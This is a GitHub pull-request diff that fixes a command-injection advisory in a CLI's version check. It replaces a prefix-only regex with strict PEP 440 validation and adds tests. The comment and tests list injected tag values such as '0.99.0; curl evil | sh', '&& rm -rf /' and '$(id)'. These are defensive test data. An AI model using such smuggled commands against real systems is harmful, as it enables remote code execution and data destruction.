Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
32 changes: 24 additions & 8 deletions src/keboola_agent_cli/services/version_service.py
Original file line number Diff line number Diff line change
Expand Up @@ -549,11 +549,20 @@ def _fetch_kbagent_latest_version(
)
response.raise_for_status()
tag = response.json().get("tag_name", "")
# Strip leading 'v' from tag (e.g. 'v0.16.0' -> '0.16.0')
version = tag.lstrip("v")
if re.match(r"\d+\.\d+\.\d+", version):
return version
return None
# Strip a single leading 'v' (e.g. 'v0.16.0' -> '0.16.0').
version = tag.removeprefix("v")
# Validate strictly as PEP 440 before the version can flow into the
# install command / URL (resolve_kbagent_wheel_url /
# build_kbagent_upgrade_command). The old `re.match(r"\d+\.\d+\.\d+", ...)`
# was NOT end-anchored, so an adversarial release tag like
# '0.99.0; curl evil | sh' passed on its '0.99.0' prefix and reached
# the upgrade command (GHSA-x6cx-93j8-pgwj).
try:
Version(version)
except InvalidVersion:
logger.warning("Ignoring malformed GitHub release tag %r", tag)
return None
return version
except (httpx.HTTPError, KeyError, ValueError):
logger.debug("Failed to fetch latest kbagent version", exc_info=True)
return None
Expand Down Expand Up @@ -616,9 +625,16 @@ def _fetch_mcp_latest_version(timeout: float = VERSION_CHECK_TIMEOUT) -> str | N
response.raise_for_status()
data = response.json()
version = data.get("info", {}).get("version", "")
if re.match(r"\d+\.\d+\.\d+", version):
return version
return None
# Same end-anchoring fix as the kbagent path (GHSA-x6cx-93j8-pgwj): the
# MCP version flows into the MCP upgrade command, so validate it strictly
# as PEP 440 rather than matching a bare prefix. PyPI already enforces
# PEP 440, so this is defense-in-depth on the install path.
try:
Version(version)
except InvalidVersion:
logger.warning("Ignoring malformed MCP version %r from PyPI", version)
return None
return version
except (httpx.HTTPError, KeyError, ValueError):
logger.debug("Failed to fetch latest MCP server version", exc_info=True)
return None
Expand Down
43 changes: 43 additions & 0 deletions tests/test_version_service.py
Original file line number Diff line number Diff line change
Expand Up @@ -51,6 +51,17 @@ def test_success(self, mock_get: MagicMock) -> None:

assert _fetch_mcp_latest_version() == "1.46.0"

@patch("keboola_agent_cli.services.version_service.httpx.get")
def test_rejects_malformed_pypi_version(self, mock_get: MagicMock) -> None:
"""GHSA-x6cx: a malformed PyPI version must be rejected, not accepted on
a valid prefix (defense-in-depth on the MCP upgrade-command path)."""
mock_response = MagicMock()
mock_response.raise_for_status = MagicMock()
mock_get.return_value = mock_response
for bad in ("1.46.0; evil", "1.46.0/../x", "garbage"):
mock_response.json.return_value = {"info": {"version": bad}}
assert _fetch_mcp_latest_version() is None, bad

@patch("keboola_agent_cli.services.version_service.httpx.get")
def test_http_error(self, mock_get: MagicMock) -> None:
import httpx
Expand Down Expand Up @@ -836,6 +847,38 @@ def test_default_uses_releases_latest_endpoint(self, mock_get: MagicMock) -> Non
url = mock_get.call_args.args[0]
assert url.endswith("/releases/latest")

@patch("keboola_agent_cli.services.version_service.httpx.get")
def test_rejects_adversarial_release_tag(self, mock_get: MagicMock) -> None:
"""GHSA-x6cx: a tag whose valid version prefix is followed by garbage
must be rejected. The old non-end-anchored ``re.match`` accepted it on
the prefix, letting it flow into the upgrade command."""
mock_response = MagicMock()
mock_response.raise_for_status = MagicMock()
mock_get.return_value = mock_response
for bad in (
"v0.99.0; curl evil | sh",
"v0.99.0 && rm -rf /",
"v0.99.0/../../x",
"v0.99.0$(id)",
"v0.99.0evil",
"vgarbage",
):
mock_response.json.return_value = {"tag_name": bad}
assert _fetch_kbagent_latest_version() is None, bad

@patch("keboola_agent_cli.services.version_service.httpx.get")
def test_accepts_valid_stable_and_beta_tags(self, mock_get: MagicMock) -> None:
mock_response = MagicMock()
mock_response.raise_for_status = MagicMock()
mock_get.return_value = mock_response
for tag, expected in (
("v0.65.1", "0.65.1"),
("v0.43.0b1", "0.43.0b1"),
("0.65.2", "0.65.2"),
):
mock_response.json.return_value = {"tag_name": tag}
assert _fetch_kbagent_latest_version() == expected, tag

@patch("keboola_agent_cli.services.version_service.httpx.get")
def test_prerelease_returns_highest_pep440_version(self, mock_get: MagicMock) -> None:
"""With include_prerelease=True: pick highest by PEP 440 ordering."""
Expand Down